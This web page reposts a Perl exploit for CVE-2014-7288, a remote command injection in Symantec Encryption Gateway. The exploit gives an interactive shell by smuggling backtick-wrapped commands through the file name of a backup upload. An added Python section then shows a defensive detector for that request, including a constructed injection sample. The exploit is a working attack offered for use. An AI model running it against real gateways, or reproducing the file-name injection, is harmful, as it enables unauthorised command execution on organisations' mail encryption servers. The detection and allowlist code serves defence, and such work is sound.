Aerosol

Symantec Encryption Gateway Remote Command Injection


#!/usr/bin/perl -w

use LWP::UserAgent;

# Vantage Point Security Advisory 2014-007
# Title: Symantec Encryption Management Server - Remote Command Injection Exploit
# CVE: CVE-2014-7288
# Vendor: Symantec
# Affected Product: Symantec Encryption Gateway
# Affected Versions: < 3.2.0 MP6
# Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/
# Exploit Info : https://www.exploit-db.com/exploits/35949/
# Author: Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham

if (($#ARGV + 1) != 1)
{
printf " Usage: \n \t$0 <Target>\n";
printf "\t$0 http://target.com/\n\n";
exit(1);
}

chomp($target=$ARGV[0]);

if($target !~ /http:\/\//) { $target = "http://$target"; }

my $ua = LWP::UserAgent->new;
$ua->timeout(10);
my $url = "$target/omc/uploadBackup.event";

for(;;)
{
print "shell : ";
chomp($cmd=<STDIN>);
my $response = $ua->post( $url,
Content_Type => 'form-data',
name => "file",
Content => [ filename => "test123|`$cmd`|-whatever.tar.gz.pgp" ]
);
print "\n".$response->content;
}

Source
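
A defender-side check for the request shape the script above sends, added here as an example (not part of the original post and not Symantec code): it parses a multipart/form-data body posted to /omc/uploadBackup.event and flags any client-supplied file name that fails an allowlist, whether it arrives as a filename= parameter or as a form field named "filename". The allowlist pattern, the sample boundary and all function names are assumptions made for this example.

```python
import re
from email import message_from_bytes

# Endpoint path as it appears in the script above.
UPLOAD_PATH = "/omc/uploadBackup.event"
# Assumption for this example: legitimate backup names use only these characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,255}")
BOUNDARY = "xYzZY"  # constructed sample boundary
SAMPLE_CT = f"multipart/form-data; boundary={BOUNDARY}"


def constructed_body(value: str, as_file_param: bool = False) -> bytes:
    """Build a constructed multipart body carrying `value` as the file name."""
    if as_file_param:
        part = (f'Content-Disposition: form-data; name="file"; filename="{value}"\r\n'
                "Content-Type: application/octet-stream\r\n\r\ndata")
    else:
        part = f'Content-Disposition: form-data; name="filename"\r\n\r\n{value}'
    return f"--{BOUNDARY}\r\n{part}\r\n--{BOUNDARY}--\r\n".encode()


def upload_filenames(content_type: str, body: bytes) -> list:
    """Collect every client-supplied file name: the filename= parameter of a
    part, and the value of a field that is itself named "filename"."""
    msg = message_from_bytes(
        b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    names = []
    if not msg.is_multipart():
        return names
    for part in msg.get_payload():
        if part.get_filename():
            names.append(part.get_filename())
        if part.get_param("name", header="content-disposition") == "filename":
            raw = part.get_payload(decode=True) or b""
            names.append(raw.decode("utf-8", "replace").strip())
    return names


def is_suspicious(method: str, path: str, content_type: str, body: bytes) -> bool:
    """True for a POST to the upload endpoint whose file name fails the allowlist."""
    if method.upper() != "POST" or not path.split("?")[0].endswith(UPLOAD_PATH):
        return False
    return any(not SAFE_NAME.fullmatch(n) for n in upload_filenames(content_type, body))


if __name__ == "__main__":
    bad = constructed_body("test123|`id`|-whatever.tar.gz.pgp")
    print(is_suspicious("POST", UPLOAD_PATH, SAMPLE_CT, bad))
```

The same allowlist works as an input validation rule on the server side: reject the upload before the file name reaches any shell or archive command.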
